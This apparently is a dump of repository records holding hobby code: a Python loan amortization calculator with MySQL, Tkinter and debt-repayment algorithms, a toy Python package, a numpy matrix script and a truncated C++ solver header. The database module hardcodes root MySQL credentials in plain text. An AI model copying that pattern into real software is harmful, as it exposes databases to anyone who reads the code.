best.grid:\n\t\t\tq.save_results()\n\telse:\n\t\tprint(\"Bye!\")\n\n\n\tview = LoanPlot(best)\n\tview.plot_history()\n\n\n\t# GUI/database implemenation\n\tdef launch_GUI():\n\t\t# Amortization Calculator Main Loop\n\t\tLoanApp = MainWindow()\n\t\tLoanApp.start()\n\n\t#launch_GUI()\n\n"
},
{
"alpha_fraction": 0.600625216960907,
"alphanum_fraction": 0.6014068126678467,
"avg_line_length": 31.35443115234375,
"blob_id": "c3efdd719d4bf36f3dd0dff5e82599d0d9eddff0",
"content_id": "d38f0d88c48c16b131eddb34f220241c31494473",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 79,
"path": "/db_connection.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "import mysql.connector as mySQL\nfrom loan import *\n\n# Context Manager for Cursor\nclass Cursor:\n def __init__(self, connection_: mySQL.MySQLConnection):\n self.temp_cursor = connection_.cursor()\n\n def __enter__(self):\n return self.temp_cursor\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.temp_cursor.close()\n\n# Class for loan_calc_db connection\n# Uses MySQLConnection object\n# To Do: Include imports in init, error handling wihtin object creation?\nclass LoanDBConnector:\n def __init__(self):\n self.config = {\n \"host\": \"localhost\",\n \"user\": \"root\",\n \"passwd\": \"password123\",\n \"database\": \"loan_calc_db\"\n }\n\n # We'll use the MySQLConnection object, so that the connection itself can be passed\n self.connection = mySQL.MySQLConnection(**self.config)\n\n # Put loan object info into db\n def add_loan_to_db(self, loan_obj: StandardLoan):\n insert = \"INSERT INTO loans (title, start_bal, int_rate, payment_amount) VALUES (%s, %s, %s, %s)\"\n values = (loan_obj.title, loan_obj.start_balance, loan_obj.int_rate, loan_obj.payment_amt)\n\n with Cursor(self.connection) as c:\n c.execute(insert, values)\n self.connection.commit()\n\n # Compare loan object payment history with payment history in db associated with loan obj\n # Update payment history in db\n def add_payment_to_history(self, loan_obj: StandardLoan):\n insert = \"INSERT INTO payment_history (title, start_bal, int_rate) VALUES (%s, %s, %s)\"\n pass\n\n # Select loans with NAME in them, return name and IDs for display in infobox\n def load_loan(self):\n pass\n\n def remove_loan(self, id_no):\n pass\n\n def wipe_db(self):\n with Cursor(self.connection) as c:\n c.execute(\"\"\"SET FOREIGN_KEY_CHECKS = 0;\n TRUNCATE loans;\n TRUNCATE payment_history;\n SET FOREIGN_KEY_CHECKS = 1;\n \"\"\", multi=\"TRUE\")\n\n print(\"DB Wiped\")\n\n def get_loans(self):\n with Cursor(self.connection) as c:\n c.execute(\"SELECT * FROM loans\")\n _list = [entry for entry in c]\n return _list\n\n # Return payment history dict for specified loan\n def get_history_for(self, id):\n pass\n\n def show_tables(self):\n with Cursor(self.connection) as c:\n c.execute(\"SHOW TABLES\")\n for table in c:\n print(table)\n\n def close_connection(self):\n self.connection.close()\n\n\n\n"
},
{
"alpha_fraction": 0.5143648982048035,
"alphanum_fraction": 0.5155410170555115,
"avg_line_length": 34.85240936279297,
"blob_id": "ae0c8208893866d6d4c994cab569516cd16ab528",
"content_id": "35e2b22edb1afba950e667775b947cc21fe28073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11904,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 332,
"path": "/priority_queue.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Data structures for ordering Loans and testing repayment methods\n# Receives list of StandardLoans and a monthly budget\n\nfrom loan import *\n\n\n\n#########################################\n# LOAN PRIORITY QUEUE\n#########################################\n\nclass PriorityQueue:\n def __init__(self, loans: list, budget, title=None):\n\n # Primary attributes\n self.title = title\n self.Q = loans\n self.budget = budget\n\n ##################################\n # PRIMARY GETTER / SETTERS\n ##################################\n # Title\n @property\n def title(self):\n return self._title\n @title.setter\n def title(self, t):\n if t is None:\n self._title = \"My Queue\"\n else:\n self._title = t\n # Budget\n @property\n def budget(self):\n return self._budget\n @budget.setter\n def budget(self, b):\n self._budget = Loan.Dec(b)\n\n # Length of Q\n @property\n def size(self):\n return len(self.Q)\n\n ##################################\n # EVALUATIVE METHODS\n ##################################\n def is_complete(self):\n return all([l.is_complete() for l in self.Q])\n\n def get_duration(self):\n return max([l.pay_no for l in self.Q])\n\n def get_num_payments(self):\n return sum([l.pay_no for l in self.Q])\n\n def get_principal_paid(self):\n return sum([l.get_principal_paid() for l in self.Q])\n\n def get_interest_paid(self):\n return sum([l.get_interest_paid() for l in self.Q])\n\n def get_total_paid(self):\n return sum([l.get_total_paid() for l in self.Q])\n\n def get_avg_p_to_i(self):\n return sum([l.get_p_to_i() for l in self.Q])/self.size\n\n def get_percent_principal(self):\n return Loan.Dec(self.get_principal_paid() / self.get_total_paid() * 100)\n\n ##############################\n # PREPARATION METHODS\n ##############################\n # Takes one or a list of Loans to append\n def add_loan(self, new):\n if isinstance(new, list):\n for l in new:\n self.add_loan(l)\n elif isinstance(new, Loan):\n self.Q.append(new)\n else:\n raise TypeError\n\n # Return a PriorityQueue of branch loans from instance\n def branch_Queue(self, t=None):\n return PriorityQueue([l.branch() for l in self.Q], self.budget, title=t)\n\n # Order loans based on key (not neccessary for cascade or ice_slide)\n def prioritize(self, key):\n if key == 'avalanche':\n # Sort by IR\n self.Q.sort(key=lambda loan: (loan.int_rate, loan.current_bal))\n elif key == 'blizzard':\n # Sorty by monthly interest cost\n self.Q.sort(key=lambda loan: (loan.get_int_due()))\n elif key == 'snowball':\n # Sort by descending balance\n self.Q.sort(key=lambda loan: (loan.current_bal), reverse=True)\n\n # Set payment amounts in each loan based on key\n # Return remainder of budget after min satisfied\n def set_all_payments(self, key):\n b = self.budget\n for loan in self.Q:\n if key == 'int':\n loan.payment_amt = loan.get_int_due()\n if key == 'min':\n loan.payment_amt = loan.min_payment\n elif key == 'avg':\n loan.payment_amt = (self.budget / self.size)\n b -= loan.payment_amt\n\n # Handle payments not covering minimum by raising error for now\n if b < 0:\n print(\"Budget cannot cover payments.\")\n raise ValueError\n return b\n\n def distribute(self, key, r):\n # Spread-style distribution\n if key == 'cascade' or key == 'ice_slide':\n self.spread(key, r)\n # Target-style distribution\n else:\n self.Q[-1].payment_amt += r\n\n def spread(self, key, r):\n # Cascade spreads remainder proportional to impact on total IR\n if key == 'cascade':\n total = sum([l.int_rate for l in self.Q])\n extra = [((l.int_rate / total) * r) for l in self.Q]\n\n # Ice Slide spreads remainder proportional to impact on total MI\n elif key == 'ice_slide':\n total = sum([l.get_int_due() for l in self.Q])\n extra = [((l.get_int_due() / total) * r) for l in self.Q]\n\n # Distribute\n for i in range(self.size):\n self.Q[i].payment_amt += extra[i]\n\n ############################################################\n # ALGORITHM METHODS\n ############################################################\n # ORDERED: Focus on targeting a single loan each cycle,\n # paying only minimums on all except target,\n # paying one off at a time\n ############################################################\n # Avalanche: Order loans by interest rate, balance,\n # target highest ir until all paid off.\n # Consistently results in lowest interest paid\n # over course of large loans.\n def avalanche(self, minimum='min'):\n return self.debt_solve('avalanche', minimum)\n ############################################################\n # Blizzard: Order loans by monthly interest cost,\n # target most expensive until all paid off.\n # Provides some benefits for small loans,\n # and/or large budgets\n def blizzard(self, minimum='min'):\n return self.debt_solve('blizzard', minimum)\n ############################################################\n # Snowball: Order loans by balance, target loan with\n # lowest starting bal, pay until all paid off.\n # Largely motivaitonal, not cost-effective.\n def snowball(self, minimum='min'):\n return self.debt_solve('snowball', minimum)\n ############################################################\n # UNORDERED: Focus on spreading payments strategically, rather\n # than strict targeting. In the short term, these\n # methods can reduce monthly cost.\n ############################################################\n # Cascade: Unordered, distribute % of budget to each loan\n # proportional to its % contribution to total\n # interest rate of all loans.\n def cascade(self, minimum='min'):\n return self.debt_solve('cascade', minimum)\n ############################################################\n # Ice Slide: Unordered, distribute % of budget to each loan\n # proportional to its % contribution to total\n # monthly cost (minimum payments) of all loans.\n def ice_slide(self, minimum='min'):\n return self.debt_solve('ice_slide', minimum)\n ############################################################\n\n # Do all methods, return MethodCompare obj of Queues sorted by \"best\"\n def find_best(self, goal='interest', minimum='min'):\n all_complete = MethodCompare([\n self.avalanche(minimum),\n self.cascade(minimum),\n self.blizzard(minimum),\n self.ice_slide(minimum),\n self.snowball(minimum)\n ])\n all_complete.order_by(goal)\n return all_complete\n\n # Main algo driver, solve-in-place, returns completed PriorityQueue\n def debt_solve(self, key, minimum):\n # Method logic map\n order_once = (key == \"avalanche\" or key == \"snowball\")\n order_every = (key == \"blizzard\")\n\n # 1) Create tempQ(branch), completedQ(empty) structures\n temp_Queue = self.branch_Queue(t=self.title+'(branch)')\n completed_Queue = PriorityQueue([], self.budget, title=self.title+f'({key})')\n\n # Initial ordering\n if order_once:\n temp_Queue.prioritize(key)\n\n # 4) Execute method until all loans popped from temp->completed\n while temp_Queue.size > 0:\n # 3) Step through payments until at least one reaches 0\n while all([not l.is_complete() for l in temp_Queue.Q]):\n\n if order_every:\n temp_Queue.prioritize(key)\n\n # Set minimums, remainder is budget leftover (raises error if<0)\n remainder = temp_Queue.set_all_payments(minimum)\n\n # Distribute remainder\n temp_Queue.distribute(key, remainder)\n\n # Make one payment for each loan in temp\n for loan in temp_Queue.Q:\n loan.pay_month()\n\n # \"Pop\" paidoff loan(s) to completed queue\n paid_off = [l for l in temp_Queue.Q if l.is_complete()]\n for l in paid_off:\n completed_Queue.add_loan(l)\n temp_Queue.Q.remove(l)\n\n # After every loan completes, (when temp Queue is empty), return completed Queue\n return completed_Queue\n\n ######################\n # DISPLAY METHODS\n ######################\n @staticmethod\n def line():\n print('-' * 30)\n \n def display_info(self, expand=False, histories=False):\n self.line()\n print(f'Queue title: {self.title}')\n # If we're displaying a completed loan, show completed info\n if self.is_complete():\n print(f'Loan order: {self.Q}')\n print(f'Duration: {self.get_duration()}')\n print(f'Total number of payments: {self.get_num_payments()}')\n print(f'Total interest paid: {self.get_interest_paid()}')\n print(f'Percent towards principal: {self.get_percent_principal()}')\n # If we're displaying an incomplete loan, display initial conditions\n else:\n print(f'Budget: {self.budget}')\n for l in self.Q:\n print(f'{l}: {l.start_balance}, {l.int_rate}')\n self.line()\n if expand:\n self.expanded_info()\n if histories:\n self.history_info()\n\n # Display individual loan info\n def expanded_info(self):\n self.line()\n for l in self.Q:\n for i in l.get_payment_info():\n print(i)\n self.line()\n\n # Display individual loan histories\n def history_info(self):\n self.line()\n print(f'{self.title} Payment History')\n for l in self.Q:\n self.line()\n print(f'{l.title} history:')\n for k, v in l.Payment_History.items():\n print(k, [str(p) for p in v])\n self.line()\n\n # Serialize histories to JSON, if complete \n def save_results(self):\n def dec_def(e):\n if isinstance(e, Decimal):\n return str(e)\n raise TypeError\n\n if not self.is_complete():\n print(\"Loans are not paid off...\")\n return\n\n import json\n with open(f'{self.title}_Histories.txt', 'w') as f:\n print(\"Saving...\")\n for l in self.Q:\n json.dump({l.title: l.get_payment_info()}, f)\n json.dump(l.Payment_History, f, default=dec_def, indent=4)\n\n print(\"Saved.\")\n\n\n######################################################\n# METHOD COMPARE OBJECT\n# Container for multiple PriorityQueues\n######################################################\nclass MethodCompare:\n def __init__(self, q_list):\n\n # List of PriorityQueues\n self.grid = q_list\n\n def order_by(self, goal):\n if goal == 'interest':\n self.grid.sort(key=lambda q: q.get_interest_paid())\n elif goal == 'time':\n self.grid.sort(key=lambda q: q.get_duration())\n elif goal == 'num_p':\n self.grid.sort(key=lambda q: q.get_num_payments())\n\n def all_complete(self):\n return all([q.is_complete() for q in self.grid])\n\n def display_info(self, **kwargs):\n for q in self.grid:\n q.display_info(**kwargs)\n\n"
},
{
"alpha_fraction": 0.554436445236206,
"alphanum_fraction": 0.5663469433784485,
"avg_line_length": 36.546546936035156,
"blob_id": "67d170a05571eea6df8f10a4f3efe158acbe1667",
"content_id": "77237daebd1940dc45824eefd1cf9543eb45946f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12510,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 333,
"path": "/view_controller.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom db_connection import *\nfrom tkinter import *\nfrom tkinter import messagebox\n\n# GUI View/Controller Class\n# Windows, graphs, infoboxes, database scroller\n# Works in concert with db_connection.py and loan.py\nclass MainWindow(Frame):\n\n def __init__(self, master=Tk(), connection=None):\n Frame.__init__(self, master)\n self.master = master\n self.my_loan = StandardLoan(0, 0, 0)\n self.loan_memory = []\n self.my_connection = connection\n self.init_window()\n\n def start(self):\n self.mainloop()\n\n ####################\n # VIEW\n ####################\n def init_window(self):\n self.master.geometry(\"600x400\")\n self.master.title(\"Loan Amortization Calculator\")\n\n self.create_labels()\n self.create_entries()\n self.create_buttons()\n\n # Create and format labels in window\n def create_labels(self):\n loan_title = Label(self.master, text=\"Loan title: \")\n bal_label = Label(self.master, text=\"Starting balance: \")\n int_label = Label(self.master, text=\"Interest rate: \")\n pymt_label = Label(self.master, text=\"Monthly payment amount: \")\n num = Label(self.master, text=\"Number of payments:\")\n new_amt = Label(self.master, text=\"New payment amount:\")\n\n # Format Labels\n loan_title.grid(row=1, column=0, sticky=W, padx=5)\n bal_label.grid(row=2, column=0, sticky=W, padx=5)\n int_label.grid(row=3, column=0, sticky=W, padx=5)\n pymt_label.grid(row=4, column=0, sticky=W, padx=5)\n new_amt.grid(row=5, column=0, sticky=W, pady=10, padx=5)\n num.grid(row=6, column=0, sticky=W, pady=10, padx=5)\n\n # Create and format entries in window\n def create_entries(self):\n self.master.title_entry = Entry(self.master)\n self.master.bal_entry = Entry(self.master)\n self.master.int_entry = Entry(self.master)\n self.master.pymt_entry = Entry(self.master)\n self.master.num_pymnts = Entry(self.master)\n self.master.new_pymnt = Entry(self.master)\n\n # Format Entries\n self.master.title_entry.grid(row=1, column=1)\n self.master.bal_entry.grid(row=2, column=1)\n self.master.int_entry.grid(row=3, column=1)\n self.master.pymt_entry.grid(row=4, column=1)\n self.master.new_pymnt.grid(row=5, column=1)\n self.master.num_pymnts.grid(row=6, column=1)\n\n # Create buttons, format, and assign commands\n def create_buttons(self):\n # Connect to DB\n connect_button = Button(self.master, text=\"Connect to DB\", command=self.connect_to_DB)\n connect_button.grid(row=1, column=2)\n\n # Disconnect from DB\n disconnect_button = Button(self.master, text=\"Disconnect\", command=self.close_DB)\n disconnect_button.grid(row=2, column=2)\n\n # Click Start\n make_loan_button = Button(self.master, text=\"Start loan\", command=self.make_loan)\n make_loan_button.grid(row=4, column=2, pady=5)\n\n # Click Update Payment\n update_button = Button(self.master, text=\"Update Payment\", command=self.update_payment)\n update_button.grid(row=5, column=2)\n\n # Click Make Payments\n pay_button = Button(self.master, text=\"Make payments\", command=self.pay_loan)\n pay_button.grid(row=6, column=2)\n\n # Click Payoff\n payoff_button = Button(self.master, text=\"Payoff\", command=self.payoff_loan)\n payoff_button.grid(row=7, column=0, sticky=W, pady=5)\n\n # Click Display\n display_button = Button(self.master, text=\"Display history\", command=self.display_info)\n display_button.grid(row=8, column=0, sticky=W, pady=5)\n\n # Unpopulate entries in window\n def clear_entries(self):\n self.master.title_entry.delete(0, \"end\")\n self.master.bal_entry.delete(0, \"end\")\n self.master.int_entry.delete(0, \"end\")\n self.master.pymt_entry.delete(0, \"end\")\n self.master.new_pymnt.delete(0, \"end\")\n self.master.num_pymnts.delete(0, \"end\")\n\n\n ####################\n # CONTROL\n ####################\n\n def connect_to_DB(self):\n try:\n self.my_connection = LoanDBConnector()\n except (NameError, mySQL.InterfaceError):\n print(\"Connection failed\")\n else:\n print(\"Connection succeeded\")\n self.start_db_scroller()\n\n def close_DB(self):\n if self.my_connection is not None:\n self.my_connection.close_connection()\n print(\"Connection closed\")\n else:\n print(\"No connection to close\")\n\n # Menu to load loan object from db into my_loan\n def start_db_scroller(self):\n # Get active loan, populate fields in self.master(calc_window)\n def load_loan():\n try:\n index = l_list_box.curselection()\n selected = l_list_box.get(index)\n except TclError:\n print(\"Invalid selection\")\n else:\n\n # Save current loan in memory before opening new\n self.loan_memory.append(self.my_loan)\n\n self.my_loan = StandardLoan(\n float(selected[2]),\n float(selected[3]),\n float(selected[4]),\n title=selected[1])\n\n self.my_loan._print_payment_info()\n\n # Clear and populate entry fields\n self.clear_entries()\n self.master.title_entry.insert(0, f\"{self.my_loan.title}\")\n self.master.bal_entry.insert(0, self.my_loan.current_bal)\n self.master.int_entry.insert(0, self.my_loan.int_rate)\n self.master.pymt_entry.insert(0, self.my_loan.payment_amt)\n\n def clear_database():\n self.my_connection.wipe_db()\n\n # Initialize Window\n # Get 10 most recent loans, display db of loans in Listbox window\n l_list = self.my_connection.get_loans()\n db_scroller = Tk()\n l_list_box = Listbox(db_scroller, height=15, width=40, selectmode=\"SINGLE\")\n db_scroller.geometry(\"500x300\")\n db_scroller.title(\"Loans in database\")\n\n for i in range(len(l_list)):\n l_list_box.insert(i, l_list[i])\n\n l_list_box.pack()\n\n # Buttons\n loan_button = Button(db_scroller, text=\"Load\", command=load_loan)\n clear_db_button = Button(db_scroller, text=\"Clear\", command=clear_database)\n loan_button.pack()\n clear_db_button.pack()\n\n # Retrieve init data from fields, initialize new loan object\n def make_loan(self):\n try:\n title = str(self.master.title_entry.get())\n bal = float(self.master.bal_entry.get())\n i_rate = float(self.master.int_entry.get())\n m_payment = float(self.master.pymt_entry.get())\n except ValueError:\n messagebox.showinfo(\"Value Error\",\n \"Make sure field entries are accurate\")\n\n # Check for conneciton. If not, don't try to add to db\n else:\n self.my_loan = StandardLoan(bal, i_rate, m_payment, title=title)\n\n # Add loan info to DB\n if self.my_connection:\n self.my_connection.add_loan_to_db(self.my_loan)\n print(\"Loan added to database\")\n\n def update_payment(self):\n _p = self.master.new_pymnt.get()\n if self.master.new_pymnt.get() == \"\":\n return\n try:\n _p = float(self.master.new_pymnt.get())\n self.my_loan.payment_amt = _p\n self.master.pymt_entry.delete(0, \"end\")\n self.master.pymt_entry.insert(0, _p)\n except ValueError:\n messagebox.showinfo(\"Update Error\",\n \"Make sure new payment amount is entered\")\n\n def pay_loan(self):\n _n = self.master.num_pymnts.get()\n\n if self.my_loan.current_bal > 0:\n # Get new payment amount, num of payments\n try:\n self.update_payment()\n self.my_loan.pay_months(int(_n))\n\n except ValueError:\n messagebox.showinfo(\"Payment Error\",\n \"Make sure number of payments and new payment amount is entered\")\n else:\n messagebox.showinfo(\"Payment Error\",\n \"Loan is already paid off\")\n\n def payoff_loan(self):\n if self.my_loan.current_bal > 0:\n self.my_loan.payoff()\n\n # Update payment history in DB\n if self.my_loan.current_bal > 0:\n messagebox.showinfo(\"Payment Error\",\n \"Payments cannot cover interest, loan will never complete.\")\n else:\n self.display_info()\n else:\n messagebox.showinfo(\"Payment Error\",\n \"Loan is already paid off\")\n\n @staticmethod\n def client_exit(self):\n exit()\n\n\n ####################\n # PLOT\n #################### \n\n def plot_Payment_History(self):\n # Get data we need from Loan object using methods\n history = self.my_loan.Payment_History\n payments = self.my_loan.pay_no\n highest_bal = float(max(history[\"balance\"]))\n # PP yields a percentage /100\n # Convert to current y scale\n pp_over_time = [(history[\"principal\"][i+1] / (history[\"principal\"][i+1]\n + history[\"interest\"][i+1]) * 100)\n if history[\"principal\"][i+1] != 0\n else 0 for i in range(payments)]\n avg_pp = [sum(pp_over_time[0:i+1]) / (i+1) for i in range(payments)]\n\n # Balance History data\n principal_history = [sum(history[\"principal\"][0:i+1]) for i in range(payments+1)]\n interest_history = [sum(history[\"interest\"][0:i+1]) for i in range(payments+1)]\n total_history = [principal_history[i] + interest_history[i] for i in range(payments+1)]\n\n ####################################\n # Payment History Plot\n ####################################\n plt.figure(self.my_loan.title)\n\n # Balance History Plots\n # Define axes of graph based on Highest Balance and # Payments\n balance_graph = plt.subplot(3, 1, 1)\n plt.title(\"Balance History\")\n plt.ylabel(\"$\")\n plt.xlabel(\"Payment #\")\n if highest_bal >= self.my_loan.get_total_paid():\n plt.axis([0, payments, 0, highest_bal])\n else:\n plt.axis([0, payments, 0, float(self.my_loan.get_total_paid())])\n balance_graph.plot(\"balance\", data=history)\n balance_graph.plot(principal_history, label=\"total principal paid\")\n balance_graph.plot(interest_history, label=\"total interest paid\")\n balance_graph.plot(total_history, label=\"total paid\")\n plt.legend()\n\n # Monthly Plots\n monthly_graph = plt.subplot(3, 1, 2)\n plt.title(\"Payment History\")\n plt.ylabel(\"$\")\n plt.xlabel(\"Payment #\")\n\n monthly_graph.bar(history[\"pay_no\"], history[\"principal\"], label=\"Towards principal\")\n monthly_graph.bar(history[\"pay_no\"], history[\"interest\"], label=\"Towards interest\")\n plt.legend()\n\n # Principal Efficiency Plots\n # Ddd zeroes to front of percenetages to scale to graph\n pp_over_time.insert(0, 0)\n avg_pp.insert(0, 0)\n interest_graph = plt.subplot(3, 1, 3)\n plt.title(\"Principal Efficiency\")\n plt.ylabel(\"%\")\n plt.xlabel(\"Payment #\")\n # If percentages are 0, display so\n if sum(pp_over_time) == 0:\n plt.axis([0, payments, -1, 1])\n else:\n plt.axis([0, payments, 0, 100])\n interest_graph.plot(pp_over_time, label=\"% of payment towards principal\")\n interest_graph.plot(avg_pp, label=\"average % towards principal\")\n plt.legend()\n\n # Show\n plt.tight_layout()\n plt.show()\n\n def display_info(self):\n if self.my_loan.pay_no > 0:\n all_info = Tk()\n all_info.geometry(\"300x200\")\n all_info.title(\"Loan Information\")\n my_info = self.my_loan.get_payment_info()\n\n for i in range(len(my_info)):\n Label(all_info, text=f\"{my_info[i]}\").grid(row=i+1, column=1, sticky=W)\n\n self.plot_Payment_History()\n else:\n messagebox.showinfo(\"Display Error\",\n \"Nothing to display\")\n\n \n\n"
}
] | 7 |
yixinmao/example_python_pkg
|
https://github.com/yixinmao/example_python_pkg
|
5e4065e453a224fbc1e3b42488f53222d04c4410
|
52666537e67836b3632034a1683d721bf14869e0
|
0b4acf1e46668700027754f1067c0e7fd4e33761
|
refs/heads/master
| 2020-05-29T11:26:22.031359 | 2019-05-28T23:28:38 | 2019-05-28T23:28:38 | 189,116,947 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6843100190162659,
"alphanum_fraction": 0.6880907416343689,
"avg_line_length": 25.399999618530273,
"blob_id": "833ed2bf7ae402d3de5d52dd6498f5795b4efeff",
"content_id": "4bcdd41f5b84c0489e37b6666a3881dac60b165c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 20,
"path": "/README.md",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "# Example Package\n\n## Step 1. Install package\n\n- Go to the top-level directory of this repo (where `setup.py` is located):\n\n `cd ./`\n\n- Install package by:\n\n `pip install ./` (recommended)\n (`pip install -e ./` for editable package)\n OR\n `python setup install`\n\n**NOTE: The package will be installed under the name `ymaotest`, which is specified in `setup.py`. However, the actual package to import is `mytest`, which is the directory name.**\n\n## Step 2. Test package installation\n\n`python scripts/run_script.py`\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 14.333333015441895,
"blob_id": "beb424d4629cdf0a42d9174d707c428271695782",
"content_id": "2ef31d7ebe29bdad1a7a3a6a2eefb76bac906ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/scripts/run_script.py",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "\nfrom mytest import run\n\nrun.print_something()\n\n"
},
{
"alpha_fraction": 0.60550457239151,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 20.399999618530273,
"blob_id": "9db01d2114a17300f16416007871e1b89f0fa47c",
"content_id": "a23194be68f1e3d4353bb39c77195fb6bd504f1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/mytest/run.py",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "\n\ndef print_something():\n print(\"HAAAHAAAAAAAAHAAAAAA\")\n\nif __name__ == \"__main__\":\n print_something()\n"
}
] | 3 |
jeesaugustine/orca_demo
|
https://github.com/jeesaugustine/orca_demo
|
012dfd33ccf28252fa4a12981fcf6fe50762dee6
|
44f88655e7962f859ae9e2ab8562dbbee92b351b
|
4b75949cf69a8c7831b88ef3855a180f69f31aae
|
refs/heads/master
| 2022-11-10T22:13:50.032293 | 2020-07-08T20:51:05 | 2020-07-08T20:51:05 | 278,191,558 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.621283233165741,
"alphanum_fraction": 0.6322378516197205,
"avg_line_length": 26.385713577270508,
"blob_id": "cd93485f159c704586b8860f64266c98610c5ca6",
"content_id": "21a29c0ccc134cafc167793937e74512ae95b5f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1917,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 70,
"path": "/app/rstudio-export/full_a_maker.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import os \nimport numpy as np\n\nclass AMaker:\n\tdef __init__(self, dim,a, dp):\n\t\tself.edge = int(dim[0])\n\t\tself.sd = int(dim[1])\n\t\tself.a_compressed = a\n\t\tself.full_a = []\n\t\tself.att = None\n\t\tself.attThresh = None\n\t\tself.attThreshCompliment = None\n\t\tself.data_path = dp\n\t\tself.threshold = 1\n\n\tdef uncompress(self):\n\t\tfor edge in self.a_compressed:\n\t\t\trow = [0]*self.sd\n\t\t\tif len(edge.strip()) != 0:\n\t\t\t\tfor e in edge.strip().split(','):\n\t\t\t\t\t# print(e)\n\t\t\t\t\trow[int(e)] = 1\n\t\t\tself.full_a.append(row)\n\t\tself.full_a = np.array(self.full_a)\n\n\tdef get_full_a(self):\n\t\tif len(self.full_a) == 0:\n\t\t\tself.uncompress()\n\n\tdef aat(self):\n\t\tself.get_full_a()\n\t\tself.att = np.dot(self.full_a,self.full_a.T)\n\n\tdef save_file(self):\n\t\tif self.att is None:\n\t\t\tself.aat()\n\t\tnp.savetxt(os.path.join(self.data_path, \"aat.csv\"), self.att, fmt=\"%d\",delimiter=\",\")\n\n\tdef aat_th(self, th):\n\t\tself.threshold = th\n\t\tself.attThresh = np.copy(self.att)\n\t\tself.attThreshCompliment =np.ones((self.edge, self.edge), dtype = np.int8)\n\t\tfor i in range(0, self.edge):\n\t\t\tif self.att[i,i] < self.threshold:\n\t\t\t\tself.attThresh[i,:] = 0\n\t\t\t\tself.attThresh[:,i] = 0\n\t\t\t\tself.attThreshCompliment[i,:] = 0\n\t\t\t\tself.attThreshCompliment[:,i] = 0\n\t\t\t\tself.attThreshCompliment[i,i] = 1\n\t\t\t\tself.attThresh[i,i] = self.att[i, i]\n\t\tnp.savetxt(os.path.join(self.data_path, \"aatThresh.csv\"), self.attThresh, fmt=\"%d\",delimiter=\",\")\n\t\tnp.savetxt(os.path.join(self.data_path, \"aatThreshCompliment.csv\"), self.attThreshCompliment, fmt=\"%d\",delimiter=\",\")\n\n\ndef get_path():\n\t\n\tpath = os.getcwd()\n\tdata_path = os.path.join(path, \"data\")\n\treturn path, data_path\n\t\nif __name__ == \"__main__\":\n\tpath, data_path = get_path()\n\ta = None\n\twith open(os.path.join(data_path, \"a.txt\"), \"rb\") as f:\n\t\ta = f.readlines()\n\t# print(type(a), a[0])\n\tamaker = AMaker(a[0].strip().split(','), a[1:], data_path)\n\tamaker.save_file()\n\tprint(int(amaker.sd/10))\n\tamaker.aat_th(int(amaker.sd/10))\n"
},
{
"alpha_fraction": 0.5591549277305603,
"alphanum_fraction": 0.5863849520683289,
"avg_line_length": 24.600000381469727,
"blob_id": "dc9918afa4de60a9b08e4088a85a26c4b8f48bf8",
"content_id": "f935dbbfb6205c572a6edbb7c3392420cce8944e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2130,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 80,
"path": "/app/rstudio-export/SR/Direct.h",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "using namespace std;\r\n#include <string>\r\n#include <vector>\r\n#include <map>\r\n#include <queue>\r\n#include <stack>\r\n\r\n#include \"GaussianElimination.h\"\r\n\r\nfloat * Direct(BMatrix A, float* b, float* xp, bool exact = true, float th=0)\r\n{\r\n\tint n = A.n, m = A.m, i;\r\n\tMatrix t = AAT(A, exact, th);\r\n\t//t.print(true);\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n]; \r\n\t// Solve system of linear equations: t*tmp = t2\r\n\tint flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\n\r\n// The following attributes are only used in the dynamic direct\r\nvector<pair<int, float> >* sig;\r\nfloat* diameter;\r\nint n, m;\r\n\r\nfloat * Dynamic_Direct(BMatrix A, float* b, float* xp, bool exact = true, float th = 0)\r\n{\r\n\t// call this, only if A has changed\r\n\tint i;\r\n\tn = A.n; m = A.m;\r\n\tsig = new vector<pair<int, float> >[A.n];\r\n\tdiameter = new float[A.n];\r\n\tMatrix t = AAT(A, exact, th);\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n];\r\n\tGenerateSignature(t, sig, diameter);\r\n\tSolveBySigint(n, 